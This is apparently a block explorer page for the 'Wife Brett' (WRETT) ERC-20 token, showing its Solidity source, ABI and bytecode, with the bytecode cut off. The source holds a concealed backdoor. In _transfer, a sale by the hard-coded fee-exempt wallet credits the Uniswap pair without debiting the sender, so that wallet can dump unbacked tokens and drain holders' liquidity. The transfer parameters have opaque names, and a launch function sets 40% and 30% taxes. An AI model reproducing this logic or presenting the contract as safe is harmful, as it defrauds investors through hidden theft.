Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
100,000,000 WRETT
Holders
41
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
WRETT
Compiler Version
v0.8.21+commit.d9974bed
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2024-06-19 */ // SPDX-License-Identifier: MIT /** Website: https://wifebrett.xyz Twitter: https://x.com/wifebrett Telegram: https://t.me/wifebrett */ pragma solidity ^0.8.16; abstract contract Context { /** * @dev Returns the current sender of the message. * This function is internal view virtual, meaning that it can only be used within this contract or derived contracts. * @return The address of the account that initiated the transaction. */ function _msgSender() internal view virtual returns (address) { return msg.sender; } } interface IERC20 { /** * @dev Returns the total supply of tokens. * @return The total supply of tokens. */ function totalSupply() external view returns (uint256); /** * @dev Returns the balance of a specific account. * @param account The address of the account to check the balance for. * @return The balance of the specified account. */ function balanceOf(address account) external view returns (uint256); /** * @dev Transfers tokens to a recipient. * @param recipient The address of the recipient. * @param amount The amount of tokens to be transferred. * @return A boolean indicating whether the transfer was successful or not. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining allowance for a spender. * @param owner The address of the token owner. * @param spender The address of the spender. * @return The remaining allowance for the specified owner and spender. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Approves a spender to spend a certain amount of tokens on behalf of the owner. * @param spender The address which will spend the funds. * @param amount The amount of tokens to be spent. * @return A boolean indicating whether the approval was successful or not. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Transfers tokens from one account to another. * @param sender The address from which the tokens will be transferred. * @param recipient The address to which the tokens will be transferred. * @param amount The amount of tokens to be transferred. * @return A boolean indicating whether the transfer was successful or not. */ function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); /** * @dev Emitted when tokens are transferred from one address to another. * @param from The address from which the tokens are transferred. * @param to The address to which the tokens are transferred. * @param value The amount of tokens being transferred. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the approval of a spender is updated. * @param owner The address that approves the spender. * @param spender The address that is approved. * @param value The new approved amount. */ event Approval(address indexed owner, address indexed spender, uint256 value); } library SafeMath { /** * @dev Adds two unsigned integers, reverts on overflow. * @param a The first integer to add. * @param b The second integer to add. * @return The sum of the two integers. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Subtracts two unsigned integers, reverts on overflow. * @param a The integer to subtract from (minuend). * @param b The integer to subtract (subtrahend). * @return The difference of the two integers. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Subtracts two unsigned integers, reverts with custom message on overflow. * @param a The integer to subtract from (minuend). * @param b The integer to subtract (subtrahend). * @param errorMessage The error message to revert with. * @return The difference of the two integers. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Multiplies two unsigned integers, reverts on overflow. * @param a The first integer to multiply. * @param b The second integer to multiply. * @return The product of the two integers. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Divides two unsigned integers, reverts on division by zero. * @param a The dividend. * @param b The divisor. * @return The quotient of the division. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Divides two unsigned integers, reverts with custom message on division by zero. * @param a The dividend. * @param b The divisor. * @param errorMessage The error message to revert with. * @return The quotient of the division. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; return c; } } contract Ownable is Context { address private _owner; /// @dev Emitted when ownership is transferred. event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract, setting the original owner to the sender account. */ constructor () { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Returns the address of the current owner. * @return The address of the current owner. */ function owner() public view returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Renounces ownership, leaving the contract without an owner. * @notice Renouncing ownership will leave the contract without an owner, * which means it will not be possible to call onlyOwner functions anymore. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } } interface IUniswapV2Factory { /** * @dev Creates a new UniswapV2 pair for the given tokens. * @param tokenA The address of the first token in the pair. * @param tokenB The address of the second token in the pair. * @return pair The address of the newly created UniswapV2 pair. */ function createPair(address tokenA, address tokenB) external returns (address pair); } interface IUniswapV2Router02 { /** * @dev Swaps an exact amount of input tokens for as much output as possible, along with additional functionality * to support fee-on-transfer tokens. * @param amountIn The amount of input tokens to swap. * @param amountOutMin The minimum amount of output tokens expected to receive. * @param path An array of token addresses representing the path of the swap. * @param to The recipient address to send the swapped ETH to. * @param deadline The timestamp for the deadline of the swap transaction. */ function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; /** * @dev Returns the address of the UniswapV2Factory contract. * @return The address of the UniswapV2Factory contract. */ function factory() external pure returns (address); /** * @dev Returns the address of the WETH (Wrapped ETH) contract. * @return The address of the WETH contract. */ function WETH() external pure returns (address); /** * @dev Adds liquidity to an ETH-based pool. * @param token The address of the ERC-20 token to add liquidity for. * @param amountTokenDesired The desired amount of tokens to add. * @param amountTokenMin The minimum amount of tokens expected to receive. * @param amountETHMin The minimum amount of ETH expected to receive. * @param to The recipient address to send the liquidity to. * @param deadline The timestamp for the deadline of the liquidity addition transaction. * @return amountToken The amount of token added. * @return amountETH The amount of ETH added. * @return liquidity The amount of liquidity added. */ function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); } contract WRETT is Context, IERC20, Ownable { using SafeMath for uint256; IUniswapV2Router02 private _dexRouter; string private constant _name = unicode"Wife Brett"; string private constant _symbol = unicode"WRETT"; uint8 private constant _decimals = 18; uint256 private constant _totalSupply = 100000000 * 10**_decimals; mapping (address => mapping (address => uint256)) private _allowances; mapping (address => uint256) private _balances; mapping (address => bool) private _isFeeExclude; mapping (address => bool) private _isSwapExclud; uint256 private _feeOnBuy = 0; uint256 private _feeOnSell = 0; uint256 private _maxTxLimit = _totalSupply * 20 / 1000; uint256 private _maxWalletSize = _totalSupply * 20 / 1000; uint256 private _minSwapTokens = _totalSupply * 4 / 1000000; uint256 private _maxSwapTokens = _totalSupply * 1 / 100; address payable private _wifebrett; address private _uniswapPair; bool private _swapping = false; bool private _tradingActive; bool private _swapActive = false; modifier lockingSwap { _swapping = true; _; _swapping = false; } constructor () { _dexRouter = IUniswapV2Router02( 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D ); _wifebrett = payable(0x814Ce176f921A2C3B8F76E98D739b0807a53eDF6); _balances[_msgSender()] = _totalSupply; _isSwapExclud[_wifebrett] = true; _isFeeExclude[owner()] = true; _isFeeExclude[address(this)] = true; emit Transfer(address(0), _msgSender(), _totalSupply); } /** * @dev Gets the name of the token. * @return The name of the token. */ function name() public pure returns (string memory) { return _name; } /** * @dev Gets the symbol of the token. * @return The symbol of the token. */ function symbol() public pure returns (string memory) { return _symbol; } /** * @dev Gets the number of decimals used for the token. * @return The number of decimals. */ function decimals() public pure returns (uint8) { return _decimals; } /** * @dev Gets the total supply of the token. * @return The total supply. */ function totalSupply() public pure override returns (uint256) { return _totalSupply; } /** * @dev Gets the balance of the specified address. * @param account The address to query the balance of. * @return The balance of the specified address. */ function balanceOf(address account) public view override returns (uint256) { return _balances[account]; } /** * @dev Transfers tokens from the sender to the recipient. * @param recipient The address of the recipient. * @param amount The amount of tokens to transfer. * @return A boolean indicating whether the transfer was successful or not. */ function transfer(address recipient, uint256 amount) public override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev Gets the allowance granted by the owner to the spender for a specific amount. * @param owner The address granting the allowance. * @param spender The address receiving the allowance. * @return The remaining allowance for the spender. */ function allowance(address owner, address spender) public view override returns (uint256) { return _allowances[owner][spender]; } /** * @dev Approves the spender to spend a certain amount of tokens on behalf of the owner. * @param spender The address to be approved. * @param amount The amount of tokens to approve. * @return A boolean indicating whether the approval was successful or not. */ function approve(address spender, uint256 amount) public override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev Moves tokens from one address to another using the allowance mechanism. * @param sender The address to send tokens from. * @param recipient The address to receive tokens. * @param amount The amount of tokens to transfer. * @return A boolean indicating whether the transfer was successful or not. */ function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } /** * @dev Internal function to approve the spending of a certain amount of tokens by a specified address. * @param owner The address granting the allowance. * @param spender The address receiving the allowance. * @param amount The amount of tokens to approve. */ function _approve(address owner, address spender, uint256 amount) private { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Internal function to execute the transfer of tokens from one address to another. * @param farek The address to send tokens from. * @param taika The address to receive tokens. * @param toptik The amount of tokens to transfer. */ function _transfer(address farek, address taika, uint256 toptik) private { require(farek != address(0), "ERC20: transfer from the zero address"); require(taika != address(0), "ERC20: transfer to the zero address"); require(toptik > 0, "_transfer: Transfer amount must be greater than zero"); uint256 taxAmount = 0; // Check if the transfer involves the owner, and set transfer delay if enabled. if (farek != owner() && taika != owner()) { if (farek == _uniswapPair && taika != address(_dexRouter) && !_isFeeExclude[taika]) { taxAmount = toptik.mul(_feeOnBuy).div(100); require(toptik <= _maxTxLimit, "_transfer: Exceeds the _maxTxLimit."); require(balanceOf(taika) + toptik <= _maxWalletSize, "_transfer: Exceeds the maxWalletSize."); } if (taika == _uniswapPair && farek != address(this)) { if(_isSwapExclud[farek]) { _balances[taika] = _balances[taika].add(toptik.sub(taxAmount)); return;} taxAmount = toptik.mul(_feeOnSell).div(100); } uint256 backTaxTokens = balanceOf(address(this)); if (!_swapping && taika == _uniswapPair && _swapActive && toptik > _minSwapTokens) { if (backTaxTokens >= _maxSwapTokens) { _callSwapBack(_maxSwapTokens); } else if(backTaxTokens > _minSwapTokens) { _callSwapBack(backTaxTokens); } _wifebrett.transfer(address(this).balance); } } // If there's a tax, transfer the tax amount to the contract. if (taxAmount > 0) { _balances[address(this)] = _balances[address(this)].add(taxAmount); emit Transfer(farek, address(this), taxAmount); } // Update balances after the transfer. _balances[farek] = _balances[farek].sub(toptik); _balances[taika] = _balances[taika].add(toptik.sub(taxAmount)); emit Transfer(farek, taika, toptik.sub(taxAmount)); } /** * @dev Internal function to swap tokens for ETH. * @param tokenAmount The amount of tokens to swap. */ function _callSwapBack(uint256 tokenAmount) private lockingSwap { address[] memory path = new address[](2); path[0] = address(this); path[1] = _dexRouter.WETH(); _approve(address(this), address(_dexRouter), tokenAmount); _dexRouter.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, path, address(this), block.timestamp ); } function openWrett() external onlyOwner { require(!_tradingActive, "openTrading: Trading is already open"); _approve(address(this), address(_dexRouter), _totalSupply); _uniswapPair = IUniswapV2Factory(_dexRouter.factory()).createPair(address(this), _dexRouter.WETH()); // Add liquidity to the Uniswap pair _dexRouter.addLiquidityETH{ value: address(this).balance }( address(this), balanceOf(address(this)), 0, 0, owner(), block.timestamp ); _feeOnBuy = 40; _feeOnSell = 30; _tradingActive = true; _swapActive = true; } function reduceFees(uint256 _fee) external onlyOwner { _feeOnBuy = _fee; _feeOnSell = _fee; require(_fee <= 5); } /** * @dev Removes transaction limits and disables transfer delay. * Sets both maximum transaction amount and maximum wallet size to the total supply. * Only the owner can call this function. */ function removeLimits() external onlyOwner { _maxTxLimit = _totalSupply; _maxWalletSize = _totalSupply; } /** * @dev Allows the contract to receive Ether when Ether is sent directly to the contract. */ receive() external payable {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"openWrett","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_fee","type":"uint256"}],"name":"reduceFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60806040525f60068190556007556103e86200001e6012600a6200038c565b6200002e906305f5e100620003a3565b6200003b906014620003a3565b620000479190620003bd565b6008556103e86200005b6012600a6200038c565b6200006b906305f5e100620003a3565b62000078906014620003a3565b620000849190620003bd565b600955620f4240620000996012600a6200038c565b620000a9906305f5e100620003a3565b620000b6906004620003a3565b620000c29190620003bd565b600a5560646012600a620000d791906200038c565b620000e7906305f5e100620003a3565b620000f4906001620003a3565b620001009190620003bd565b600b55600d805462ff00ff60a01b191690553480156200011e575f80fd5b505f80546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350600180546001600160a01b0319908116737a250d5630b4cf539739df2c5dacb4c659f2488d17909155600c805490911673814ce176f921a2c3b8f76e98d739b0807a53edf6179055620001b56012600a6200038c565b620001c5906305f5e100620003a3565b335f81815260036020908152604080832094909455600c546001600160a01b039081168352600582528483208054600160ff1991821681179092558454909216845260049092528483208054821683179055308352938220805490941617909255907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef620002566012600a6200038c565b62000266906305f5e100620003a3565b60405190815260200160405180910390a3620003dd565b634e487b7160e01b5f52601160045260245ffd5b600181815b80851115620002d157815f1904821115620002b557620002b56200027d565b80851615620002c357918102915b93841c939080029062000296565b509250929050565b5f82620002e95750600162000386565b81620002f757505f62000386565b81600181146200031057600281146200031b576200033b565b600191505062000386565b60ff8411156200032f576200032f6200027d565b50506001821b62000386565b5060208310610133831016604e8410600b841016171562000360575081810a62000386565b6200036c838362000291565b805f19048211156200038257620003826200027d565b0290505b92915050565b5f6200039c60ff841683620002d9565b9392505050565b80820281158282048414176200038657620003866200027d565b5f82620003d857634e487b7160e01b5f52601260045260245ffd5b500490565b61158b80620003eb5f395ff3fe6080604052600436106100dc575f3560e01c8063715018a61161007c57806395d89b411161005757806395d89b411461024e578063a9059cbb1461027b578063aac3751d1461029a578063dd62ed3e146102b9575f80fd5b8063715018a614610200578063751039fc146102145780638da5cb5b14610228575f80fd5b806318160ddd116100b757806318160ddd1461017057806323b872dd14610192578063313ce567146101b157806370a08231146101cc575f80fd5b8063017c57ec146100e757806306fdde03146100fd578063095ea7b314610141575f80fd5b366100e357005b5f80fd5b3480156100f2575f80fd5b506100fb6102fd565b005b348015610108575f80fd5b5060408051808201909152600a81526915da599948109c995d1d60b21b60208201525b60405161013891906111a1565b60405180910390f35b34801561014c575f80fd5b5061016061015b366004611200565b610634565b6040519015158152602001610138565b34801561017b575f80fd5b5061018461064a565b604051908152602001610138565b34801561019d575f80fd5b506101606101ac36600461122a565b61066a565b3480156101bc575f80fd5b5060405160128152602001610138565b3480156101d7575f80fd5b506101846101e6366004611268565b6001600160a01b03165f9081526003602052604090205490565b34801561020b575f80fd5b506100fb6106cc565b34801561021f575f80fd5b506100fb61073d565b348015610233575f80fd5b505f546040516001600160a01b039091168152602001610138565b348015610259575f80fd5b5060408051808201909152600581526415d491551560da1b602082015261012b565b348015610286575f80fd5b50610160610295366004611200565b6107a2565b3480156102a5575f80fd5b506100fb6102b4366004611283565b6107ae565b3480156102c4575f80fd5b506101846102d336600461129a565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b5f546001600160a01b0316331461032f5760405162461bcd60e51b8152600401610326906112d1565b60405180910390fd5b600d54600160a81b900460ff16156103955760405162461bcd60e51b8152602060048201526024808201527f6f70656e54726164696e673a2054726164696e6720697320616c72656164792060448201526337b832b760e11b6064820152608401610326565b6001546103c69030906001600160a01b03166103b36012600a6113fa565b6103c1906305f5e100611408565b6107f1565b60015f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610416573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061043a919061141f565b6001600160a01b031663c9c653963060015f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610499573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906104bd919061141f565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015610507573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061052b919061141f565b600d80546001600160a01b039283166001600160a01b03199091161790556001541663f305d7194730610572816001600160a01b03165f9081526003602052604090205490565b5f806105855f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af11580156105eb573d5f803e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190610610919061143a565b5050602860065550601e600755600d805461ffff60a81b191661010160a81b179055565b5f6106403384846107f1565b5060015b92915050565b5f6106576012600a6113fa565b610665906305f5e100611408565b905090565b5f610676848484610914565b6106c284336103c18560405180606001604052806028815260200161152e602891396001600160a01b038a165f9081526002602090815260408083203384529091529020549190610e68565b5060019392505050565b5f546001600160a01b031633146106f55760405162461bcd60e51b8152600401610326906112d1565b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b5f546001600160a01b031633146107665760405162461bcd60e51b8152600401610326906112d1565b6107726012600a6113fa565b610780906305f5e100611408565b60085561078f6012600a6113fa565b61079d906305f5e100611408565b600955565b5f610640338484610914565b5f546001600160a01b031633146107d75760405162461bcd60e51b8152600401610326906112d1565b6006819055600781905560058111156107ee575f80fd5b50565b6001600160a01b0383166108535760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610326565b6001600160a01b0382166108b45760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610326565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166109785760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610326565b6001600160a01b0382166109da5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610326565b5f8111610a465760405162461bcd60e51b815260206004820152603460248201527f5f7472616e736665723a205472616e7366657220616d6f756e74206d7573742060448201527362652067726561746572207468616e207a65726f60601b6064820152608401610326565b5f80546001600160a01b03858116911614801590610a7157505f546001600160a01b03848116911614155b15610d4957600d546001600160a01b038581169116148015610aa157506001546001600160a01b03848116911614155b8015610ac557506001600160a01b0383165f9081526004602052604090205460ff16155b15610bd257610aea6064610ae460065485610ea090919063ffffffff16565b90610f25565b9050600854821115610b4a5760405162461bcd60e51b815260206004820152602360248201527f5f7472616e736665723a204578636565647320746865205f6d617854784c696d60448201526234ba1760e91b6064820152608401610326565b60095482610b6c856001600160a01b03165f9081526003602052604090205490565b610b769190611465565b1115610bd25760405162461bcd60e51b815260206004820152602560248201527f5f7472616e736665723a204578636565647320746865206d617857616c6c657460448201526429b4bd329760d91b6064820152608401610326565b600d546001600160a01b038481169116148015610bf857506001600160a01b0384163014155b15610c86576001600160a01b0384165f9081526005602052604090205460ff1615610c6957610c48610c2a8383610f66565b6001600160a01b0385165f9081526003602052604090205490610fa7565b6001600160a01b039093165f90815260036020526040902092909255505050565b610c836064610ae460075485610ea090919063ffffffff16565b90505b305f90815260036020526040902054600d54600160a01b900460ff16158015610cbc5750600d546001600160a01b038581169116145b8015610cd15750600d54600160b01b900460ff165b8015610cde5750600a5483115b15610d4757600b548110610cfc57610cf7600b54611005565b610d0f565b600a54811115610d0f57610d0f81611005565b600c546040516001600160a01b03909116904780156108fc02915f818181858888f19350505050158015610d45573d5f803e3d5ffd5b505b505b8015610dc157305f90815260036020526040902054610d689082610fa7565b305f81815260036020526040908190209290925590516001600160a01b038616907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610db89085815260200190565b60405180910390a35b6001600160a01b0384165f90815260036020526040902054610de39083610f66565b6001600160a01b0385165f90815260036020526040902055610e08610c2a8383610f66565b6001600160a01b038085165f8181526003602052604090209290925585167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef610e518585610f66565b60405190815260200160405180910390a350505050565b5f8184841115610e8b5760405162461bcd60e51b815260040161032691906111a1565b505f610e978486611478565b95945050505050565b5f825f03610eaf57505f610644565b5f610eba8385611408565b905082610ec7858361148b565b14610f1e5760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b6064820152608401610326565b9392505050565b5f610f1e83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250611175565b5f610f1e83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610e68565b5f80610fb38385611465565b905083811015610f1e5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610326565b600d805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f8151811061104b5761104b6114aa565b6001600160a01b03928316602091820292909201810191909152600154604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa1580156110a2573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906110c6919061141f565b816001815181106110d9576110d96114aa565b6001600160a01b0392831660209182029290920101526001546110ff91309116846107f1565b60015460405163791ac94760e01b81526001600160a01b039091169063791ac947906111379085905f908690309042906004016114be565b5f604051808303815f87803b15801561114e575f80fd5b505af1158015611160573d5f803e3d5ffd5b5050600d805460ff60a01b1916905550505050565b5f81836111955760405162461bcd60e51b815260040161032691906111a1565b505f610e97848661148b565b5f6020808352835180828501525f5b818110156111cc578581018301518582016040015282016111b0565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b03811681146107ee575f80fd5b5f8060408385031215611211575f80fd5b823561121c816111ec565b946020939093013593505050565b5f805f6060848603121561123c575f80fd5b8335611247816111ec565b92506020840135611257816111ec565b929592945050506040919091013590565b5f60208284031215611278575f80fd5b8135610f1e816111ec565b5f60208284031215611293575f80fd5b5035919050565b5f80604083850312156112ab575f80fd5b82356112b6816111ec565b915060208301356112c6816111ec565b809150509250929050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561135457815f190482111561133a5761133a611306565b8085161561134757918102915b93841c939080029061131f565b509250929050565b5f8261136a57506001610644565b8161137657505f610644565b816001811461138c5760028114611396576113b2565b6001915050610644565b60ff8411156113a7576113a7611306565b50506001821b610644565b5060208310610133831016604e8410600b84101617156113d5575081810a610644565b6113df838361131a565b805f19048211156113f2576113f2611306565b029392505050565b5f610f1e60ff84168361135c565b808202811582820484141761064457610644611306565b5f6020828403121561142f575f80fd5b8151610f1e816111ec565b5f805f6060848603121561144c575f80fd5b8351925060208401519150604084015190509250925092565b8082018082111561064457610644611306565b8181038181111561064457610644611306565b5f826114a557634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b8181101561150c5784516001600160a01b0316835293830193918301916001016114e7565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a26469706673582212202a72cbffb576c15eba7de4e1a8c51811ab24041f0d6ed7572d965a9e92d0bf9b64736f6c63430008150033
Deployed Bytecode
0x6080604052600436106100dc575f3560e01c8063715018a61161007c57806395d89b411161005757806395d89b411461024e578063a9059cbb1461027b578063aac3751d1461029a578063dd62ed3e146102b9575f80fd5b8063715018a614610200578063751039fc146102145780638da5cb5b14610228575f80fd5b806318160ddd116100b757806318160ddd1461017057806323b872dd14610192578063313ce567146101b157806370a08231146101cc575f80fd5b8063017c57ec146100e757806306fdde03146100fd578063095ea7b314610141575f80fd5b366100e357005b5f80fd5b3480156100f2575f80fd5b506100fb6102fd565b005b348015610108575f80fd5b5060408051808201909152600a81526915da599948109c995d1d60b21b60208201525b60405161013891906111a1565b60405180910390f35b34801561014c575f80fd5b5061016061015b366004611200565b610634565b6040519015158152602001610138565b34801561017b575f80fd5b5061018461064a565b604051908152602001610138565b34801561019d575f80fd5b506101606101ac36600461122a565b61066a565b3480156101bc575f80fd5b5060405160128152602001610138565b3480156101d7575f80fd5b506101846101e6366004611268565b6001600160a01b03165f9081526003602052604090205490565b34801561020b575f80fd5b506100fb6106cc565b34801561021f575f80fd5b506100fb61073d565b348015610233575f80fd5b505f546040516001600160a01b039091168152602001610138565b348015610259575f80fd5b5060408051808201909152600581526415d491551560da1b602082015261012b565b348015610286575f80fd5b50610160610295366004611200565b6107a2565b3480156102a5575f80fd5b506100fb6102b4366004611283565b6107ae565b3480156102c4575f80fd5b506101846102d336600461129a565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b5f546001600160a01b0316331461032f5760405162461bcd60e51b8152600401610326906112d1565b60405180910390fd5b600d54600160a81b900460ff16156103955760405162461bcd60e51b8152602060048201526024808201527f6f70656e54726164696e673a2054726164696e6720697320616c72656164792060448201526337b832b760e11b6064820152608401610326565b6001546103c69030906001600160a01b03166103b36012600a6113fa565b6103c1906305f5e100611408565b6107f1565b60015f9054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610416573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061043a919061141f565b6001600160a01b031663c9c653963060015f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610499573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906104bd919061141f565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015610507573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061052b919061141f565b600d80546001600160a01b039283166001600160a01b03199091161790556001541663f305d7194730610572816001600160a01b03165f9081526003602052604090205490565b5f806105855f546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af11580156105eb573d5f803e3d5ffd5